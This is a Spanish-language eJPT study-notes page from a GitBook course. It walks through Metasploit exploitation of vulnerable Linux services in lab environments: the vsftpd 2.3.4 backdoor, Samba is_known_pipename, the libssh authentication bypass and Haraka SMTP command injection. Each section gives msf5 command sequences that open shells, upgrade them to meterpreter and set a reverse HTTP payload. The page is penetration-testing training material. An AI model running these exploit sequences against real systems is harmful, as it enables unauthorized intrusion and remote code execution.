eJPT
  • 👋Welcome
  • Tools
    • 🔭Escaneo y Enumeración
  • SECTION 1: Assessment Methodologies
    • Assessment Methodologies: Information Gathering
      • Introducción a la Recopilación de Información
        • Start Quiz
      • Passive Information Gathering
      • Active Information Gathering
    • Assessment Methodologies: Footprinting & Scanning
      • Introduction
      • Networking Primer
      • Host Discovery
      • Port Scanning
      • Evasion, Scan Performance & Output
      • Page
      • Challenges
    • Assessment Methodologies: Enumeration
      • Overview
      • SMB Lesson
      • FTP Lesson
      • SSH Lesson
      • HTTP Lesson
      • SQL Lesson
    • Assessment Methodologies: Vulnerability Assessment
      • Vulnerability Assessment
      • Course Labs
  • SECTION 2: Host & Networking Auditing
    • Assessment Methodologies: Auditing Fundamentals
      • Assessment Methodologies
      • Practice
  • SECTION 3: Host & Network Penetration Testing
    • Host & Network Penetration Testing: System/Host Based Attacks
      • Introduction to Attacks
      • Windows Vulnerabilities
      • Exploiting Windows Vulnerabilities
      • Windows Privilege Escalation
      • Windows File System Vulnerabilities
      • Windows Credential Dumping
      • Linux Vulnerabilities
      • Exploiting Linux Vulnerabilities
      • Linux Privilege Escalation
      • Linux Credential Dumping
      • Conclusion
    • Host & Network Penetration Testing: Network-Based Attacks
      • Network-Based Attacks
    • Host & Network Penetration Testing: The Metasploit Framework (MSF)
      • Metasploit
        • Metasploit Fundamentals
      • Information Gathering & Enumeration
        • Nmap
        • Enumeration
      • Vulnerability Scanning
        • MSF
        • Nessus
        • Web Apps
      • Client-Side Attacks
        • Payloads
        • Automating
      • Exploitation
        • Windows Exploitation
        • Linux Exploitation
        • Post Exploitation Fundamentals
        • Windows Post Exploitation
        • Linux Post Exploitation
      • Armitage
        • Metasploit GUIs
    • Host & Network Penetration Testing: Exploitation
      • Introduction To Exploitation
      • Vulnerability Scanning Overview
      • Exploits
        • Searching For Exploits
        • Fixing Exploits
      • Shells
      • Frameworks
      • Windows
      • Linux
      • Obfuscation
    • Host & Network Penetration Testing: Post-Exploitation
      • Introduction
      • Windows Enumeration
      • Linux Enumeration
      • Transferring Files
      • Shells
      • Escalation
        • Windows Privilege Escalation
        • Linux Privilege Escalation
      • Persistence
        • Windows Persistence
        • Linux Persistence
      • Dumping & Cracking
        • Windows Password Hashes
        • Linux Password Hashes
      • Pivoting Lesson
      • Clearing
  • Host & Network Penetration Testing: Social Engineering
    • Social Engineering
  • SECTION 4: Web Application Penetration Testing
    • Introduction to the Web & HTTP Protocol
      • Web Applications
      • HTTP Protocol
        • HTTP/S Protocol Fundamentals
        • Website Crawling & Spidering
Powered by GitBook
On this page
  • Exploiting A Vulnerable FTP Server
  • Exploiting FTP
  • Demo: Exploiting A Vulnerable FTP Server
  • Quiz: Exploiting A Vulnerable FTP Server
  • Exploiting Samba
  • Demo: Exploiting Samba
  • Quiz: Exploiting Samba
  • Exploiting A Vulnerable SSH Server
  • Exploiting SSH
  • Demo: Exploiting A Vulnerable SSH Server
  • Quiz: Exploiting A Vulnerable SSH Server
  • Exploiting A Vulnerable SMTP Server
  • Exploiting SMTP
  • Demo: Exploiting A Vulnerable SMTP Server
  • Quiz: Exploiting A Vulnerable SMTP Server
  1. SECTION 3: Host & Network Penetration Testing
  2. Host & Network Penetration Testing: The Metasploit Framework (MSF)
  3. Exploitation

Linux Exploitation

Exploiting A Vulnerable FTP Server

Exploiting FTP

FTP (File Transfer Protocol) es un protocolo que utiliza el puerto TCP 21 y se utiliza para facilitar el intercambio de archivos entre un servidor y un cliente o clientes.

También se utiliza con frecuencia como medio para transferir archivos hacia y desde el directorio de un servidor web.

vsftpd es un servidor FTP para sistemas tipo Unix, incluidos los sistemas Linux, y es el servidor FTP predeterminado para Ubuntu, CentOS y Fedora.

vsftpd V2.3.4 es vulnerable a una vulnerabilidad de ejecución de comandos que se ve facilitada por un backdoor malicioso que se agregó al archivo de descarga de vsftpd a través de un ataque a la cadena de suministro.

Demo: Exploiting A Vulnerable FTP Server

msf5 > workspace -a vsftpd2.3.4
msf5 > setg RHOSTS 192.209.183.3
msf5 > db_nmap -sS -sV -O 192.209.183.3
msf5 > services
msf5 > vulns
msf5 > analize # No funciona en todos los casos

msf5 > search vsftpd
msf5 > use exploit/unix/ftp/vsftpd_234_backoor
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show options
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > run
/bin/bash i
ctrl+z
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > sessions
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > use post/multi/manage/shell_to_meterpreter
msf5 post(multi/manage/shell to meterpreter) > show options
# Este modulo requiere
#    1. Acceso al sistema destino
#    2. El acceso debe de ser dado por una sesion
msf5 post(multi/manage/shell to meterpreter) > run
msf5 post(multi/manage/shell to meterpreter) > sessions
# Ingresar a la sesion que se abrio
# Es normal ver un error en la ejecucion del comando
# INGRESAR A LA SESION QUE SE CREO

Quiz: Exploiting A Vulnerable FTP Server

Exploiting Samba

SMB (Server Message Block) es un protocolo de intercambio de archivos de red que se utiliza para facilitar el intercambio de archivos y periféricos entre equipos en una red local (LAN).

SMB utiliza el puerto 445 (TCP). Sin embargo, originalmente, SMB se ejecutaba sobre NetBIOS utilizando el puerto 139.

Samba es la implementación de SMB para Linux y permite que los sistemas Windows accedan a recursos compartidos y dispositivos Linux.

Samba V3.5.0 es vulnerable a una vulnerabilidad de ejecución de código remoto, lo que permite que un cliente malintencionado cargue una libreria compartida en un recurso compartido escribible y luego haga que el servidor la cargue y la ejecute.

Demo: Exploiting Samba

msf5 > workspace -a samba
msf5 > setg RHOSTS 192.18.76.3
msf5 > db_nmap -sS -sV -O 192.18.76.3
msf5 > search type:exploit name:samba
msf5 > use exploit/linux/samba/is_known_pipename
msf5 exploit(linux/samba/is_known_pipename) > show options

# Ejecute el siguiente comando para verificar aplica el exploit
msf5 exploit(linux/samba/is_known_pipename) > check
msf5 exploit(linux/samba/is_known_pipename) > info
msf5 exploit(linux/samba/is_known_pipename) > run
# Abrira una sesion meterpreter
# Mejorar la sesion meterpreter en caso de no tener una visibilidad buena
ctrl+z
msf5 exploit(linux/samba/is_known_pipename) > sessions
msf5 exploit(linux/samba/is_known_pipename) > search shell_to_meterpreter
msf5 exploit(linux/samba/is_known_pipename) > use post/multi/manage/shell_to_meterpreter
msf5 post(multi/manage/shell to meterpreter) > show options
msf5 post(multi/manage/shell to meterpreter) > set LHOST eth1
msf5 post(multi/manage/shell to meterpreter) > set SESSION 1
msf5 post(multi/manage/shell to meterpreter) > run
msf5 post(multi/manage/shell to meterpreter) > sessions
msf5 post(multi/manage/shell to meterpreter) > sessions 2

Quiz: Exploiting Samba

Exploiting A Vulnerable SSH Server

Exploiting SSH

SSH (Secure Shell) es un protocolo de administración remota que ofrece cifrado y es el sucesor de Telnet. Se utiliza normalmente para el acceso remoto a servidores y sistemas.

SSH utiliza el puerto TCP 22 de forma predeterminada, sin embargo, al igual que otros servicios, se puede configurar para utilizar cualquier otro puerto TCP abierto.

libssh es una biblioteca C multiplataforma que implementa el protocolo SSHv2 en el lado del cliente y del servidor.

libssh VO.6.O-O.8.O es vulnerable a una vulnerabilidad de omisión de autenticación en el código del servidor libssh que se puede explotar para ejecutar comandos en el servidor de destino.

Demo: Exploiting A Vulnerable SSH Server

msf5 > workspace -a libssh
msf5 > setg RHOSTS 192.40.32.31
msf5 > db_nmap -ss -sv -o 192.40.32.31
msf5 > services
msf5 > search libssh_auth_bypass
msf5 > use auxiliary/scanner/ssh/libssh_auth_bypass

msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > show options
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set SPAWN_PTY true
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > run
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > sessions
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > sessions 1
# Convertir la shell en interpreter
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > search shell_to_meterpreter
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > use post/multi/manage/shell_to_meterpreter
msf5 post(multi/manage/shell to_meterpreter) > show options
msf5 post(multi/manage/shell to_meterpreter) > set LHOST eth1
msf5 post(multi/manage/shell to_meterpreter) > set SESSION 1
msf5 post(multi/manage/shell to_meterpreter) > run
msf5 post(multi/manage/shell to_meterpreter) > sessions
msf5 post(multi/manage/shell to_meterpreter) > session 2

Quiz: Exploiting A Vulnerable SSH Server

Exploiting A Vulnerable SMTP Server

Exploiting SMTP

SMTP (Simple Mail Transfer Protocol) es un protocolo de comunicación que se utiliza para la transmisión de correo electrónico.

SMTP utiliza el puerto TCP 25 de forma predeterminada. También se puede configurar para que se ejecute en los puertos TCP 465 y 587.

Haraka es un servidor SMTP de alto rendimiento y código abierto desarrollado en Node.js.

El servidor SMTP Haraka incluye un complemento para procesar archivos adjuntos. Las versiones de Haraka anteriores a la 2.8.9 son vulnerables a la inyección de comandos.

Demo: Exploiting A Vulnerable SMTP Server

msf5 > workspace -a haraka
msf5 > setg RHOSTS 192.86.51.3
msf5 > setg rhost 192.86.51.3
msf5 > db_nmap -sV -O 192.86.51.3
msf5 > search type:exploit name:haraka

msf5 > use exploit/linux/smtp/haraka
msf5 exploit(linux/smtp/haraka) > show options
msf5 exploit(linux/smtp/haraka) > set SRVPORT 9898
msf5 exploit(linux/smtp/haraka) > set email_to root@attackdefense.test
msf5 exploit(linux/smtp/haraka) > set payload linux/x64/meterpreter_reverse_http
msf5 exploit(linux/smtp/haraka) > set LHOST ethl
msf5 exploit(linux/smtp/haraka) > run

Quiz: Exploiting A Vulnerable SMTP Server

PreviousWindows ExploitationNextPost Exploitation Fundamentals

Last updated 9 months ago